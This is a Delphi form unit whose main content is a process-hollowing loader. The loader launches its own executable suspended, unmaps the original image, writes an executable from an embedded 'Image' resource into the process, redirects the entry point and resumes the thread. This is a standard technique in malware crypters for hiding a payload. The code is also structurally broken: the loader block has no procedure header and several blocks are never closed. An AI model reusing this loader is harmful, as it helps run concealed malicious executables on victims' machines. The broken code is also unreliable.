unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls,ntddk;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private-Deklarationen }
  public
    { Public-Deklarationen }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

function Protect(Characteristics: ULONG): ULONG;
const
  Mapping: array [0..7] of ULONG = (
    PAGE_NOACCESS,
    PAGE_EXECUTE,
    PAGE_READONLY,
    PAGE_EXECUTE_READ,
    PAGE_READWRITE,
    PAGE_EXECUTE_READWRITE,
    PAGE_READWRITE,
    PAGE_EXECUTE_READWRITE
  );
begin
  Result := Mapping[Characteristics shr 29];
end;

type
  PImageSectionHeaders = ^TImageSectionHeaders;
  TImageSectionHeaders = array [0..95] of TImageSectionHeader;
var
  ProcessInfo: TProcessInformation;
  StartupInfo: TStartupInfo;
  Success: Boolean;
  Context: TContext;
  BaseAddress: Pointer;
  BytesRead: DWORD;
  Resource: Pointer;
  NtHeaders: PImageNtHeaders;
  BytesWritten: DWORD;
  Sections: PImageSectionHeaders;
  i: ULONG;
  OldProtect: ULONG;
begin
  FillChar(StartupInfo, SizeOf(TStartupInfo), 0);
  StartupInfo.cb := SizeOf(TStartupInfo);
  if CreateProcess(nil, PChar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED,
    nil, nil, StartupInfo, ProcessInfo) then
  begin
    Success := False;
    try
      Context.ContextFlags := CONTEXT_INTEGER;
      if GetThreadContext(ProcessInfo.hThread, Context) and
         ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
          @BaseAddress, SizeOf(BaseAddress), BytesRead) and
        (ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0) then
      begin
        Resource := LockResource(
          LoadResource(0, FindResource(0, 'Image', 'EXE')));
        if Assigned(Resource) then
        begin
          NtHeaders := PImageNtHeaders(
            Cardinal(Resource) + Cardinal(PImageDosHeader(Resource)._lfanew));
          BaseAddress := ntddk.VirtualAllocEx(ProcessInfo.hProcess,
            Pointer(NtHeaders.OptionalHeader.ImageBase),
            NtHeaders.OptionalHeader.SizeOfImage,
            MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
          if Assigned(BaseAddress) and WriteProcessMemory(ProcessInfo.hProcess,
            BaseAddress, Resource, NtHeaders.OptionalHeader.SizeOfHeaders,
            BytesWritten) then
          begin
            Sections := PImageSectionHeaders(ImageFirstSection(NtHeaders));
            for i := 0 to NtHeaders.FileHeader.NumberOfSections - 1 do
              if WriteProcessMemory(ProcessInfo.hProcess,
                Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress),
                Pointer(Cardinal(Resource) + Sections[i].PointerToRawData),
                Sections[i].SizeOfRawData, BytesWritten) then
                ntddk.VirtualProtectEx(ProcessInfo.hProcess,
                  Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress),
                  Sections[i].Misc.VirtualSize,
                  Protect(Sections[i].Characteristics), OldProtect);
            if WriteProcessMemory(ProcessInfo.hProcess,
              Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress),
              BytesWritten) then
            begin
              Context.Eax := ULONG(BaseAddress) +
                NtHeaders.OptionalHeader.AddressOfEntryPoint;
              Success := SetThreadContext(ProcessInfo.hThread, Context);
            end;
          end;
        end;
      end;
    finally
      if not Success then
        TerminateProcess(ProcessInfo.hProcess, 0)
      else
        ResumeThread(ProcessInfo.hThread);
      CloseHandle(ProcessInfo.hProcess);
      CloseHandle(ProcessInfo.hThread);
    end;

procedure TForm1.Button1Click(Sender: TObject);
begin
Close();
end;